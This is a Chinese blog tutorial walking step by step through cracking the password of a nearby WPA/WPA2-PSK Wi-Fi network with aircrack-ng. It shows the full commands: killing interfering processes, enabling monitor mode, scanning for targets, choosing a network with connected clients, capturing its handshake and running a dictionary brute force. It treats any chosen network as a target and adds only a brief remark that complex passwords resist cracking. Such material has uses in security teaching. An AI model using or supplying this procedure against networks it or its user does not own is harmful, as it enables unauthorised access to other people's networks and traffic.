aircrack-ng破解安全性为WPA/WPA2 PSK的无线网络

1.ifconfig -a

使用该命令查看本机的无线网卡
[img]http://dl2.iteye.com/upload/attachment/0125/2722/4b6cd6db-c09a-3d90-ba38-1b7098280889.png[/img]

2.ifconfig
使用该命令查看本机已启动的无线网卡
[img]http://dl2.iteye.com/upload/attachment/0125/2724/fd400100-6238-37ec-abb6-ccee76a5f096.png[/img]
可以发现wlan1,这一网卡并没有显示在上面.如果想使用它进行下面的破解密码操作,首先使用ifconfig wlan1 up启动它.
3.airmon-ng check kill

使用该命令kill一些会影响接下来的操作的进程
[img]http://dl2.iteye.com/upload/attachment/0125/2726/25d207b1-7e6a-336c-8539-23abb8cc7c41.png[/img]
4.airmon-ng start wlan0

使用该命令使wlan0网卡开启monitor mode
[img]http://dl2.iteye.com/upload/attachment/0125/2728/69165c7a-1f3d-3099-abdc-d2e8fc598412.png[/img]
5.airodump-ng wlan0mon

使用该命令查看附近的无线网络
[img]http://dl2.iteye.com/upload/attachment/0125/2730/6a81a1b0-8552-328f-8393-423d9aae6856.png[/img]
选择一个你想破解密码的无线网络,记下它的BSSID、CH(channel),下面的命令会用到. BSSID STATION PWR RATE......下面显示的是有终端连接的无线网络.

注意最好选择有终端连接的无线网络,即选择在上边的图片中BSSID STATION PWR RATE......下面出现的BSSID,因为这些BSSID有终端连接,如手机、平板等,

选择这些更容易抓到handshake包(即用于连接无线网络时发送的认证包),当然也可以选择没在BSSID STATION PWR RATE......下面出现的BSSID,现在没有 终端连接,可能 在我们抓包的过程中会有终端连接进来.
6.airodump-ng --bssid F0:B4:29:29:8A:03 -c 3 -w crack wlan0mon
使用该命令抓取某个无线网络的数据包,命令参数解释:bssid、c为filter option;w后面的crack是存放抓取后的数据包的文件名,自定义即可.
[img]http://dl2.iteye.com/upload/attachment/0125/2732/83aed20f-1801-34d2-a387-d870caeb66f5.png[/img]
[img]http://dl2.iteye.com/upload/attachment/0125/2734/7e0492d0-e189-376b-be21-560adb9220ba.png[/img]
7.等待,直到抓到handshake包
[img]http://dl2.iteye.com/upload/attachment/0125/2736/e49a8a66-1dc5-3eb4-bba8-4f606c0b636c.png[/img]
8.aircrack-ng -w /tmp/WPADict.txt crack-01.cap

使用该命令通过密码字典文件暴力破解该无线网络的密码.
[img]http://dl2.iteye.com/upload/attachment/0125/2738/9360f7ea-c255-3881-8da8-049ca35a464a.png[/img]
[img]http://dl2.iteye.com/upload/attachment/0125/2740/bee6057b-005e-3b80-97f9-03b41ba5d9db.png[/img]
9.破解出密码

如果足够幸运即密码字典文件中有这一无线网络的密码,那么一段时间后(5、6个小时甚至更长都有可能)就可以找到这一密码.
[img]http://dl2.iteye.com/upload/attachment/0125/2742/5c7d427a-dba6-363a-b49d-fbc81ca5fc08.png[/img]
如果密码字典文件中没有这一密码,则破解不出该无线网络的密码.
[img]http://dl2.iteye.com/upload/attachment/0125/2744/2bed344d-9b0f-3393-8a20-73151e4839aa.png[/img]
可以看出设计一个复杂的密码,可以降低被破解的几率.
10.airmon-ng stop wlan0mon

使用该命令关闭wlan0无线网卡monitor mode
[img]http://dl2.iteye.com/upload/attachment/0125/2746/692ecd17-7288-3847-9e02-b17701cbad22.png[/img]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值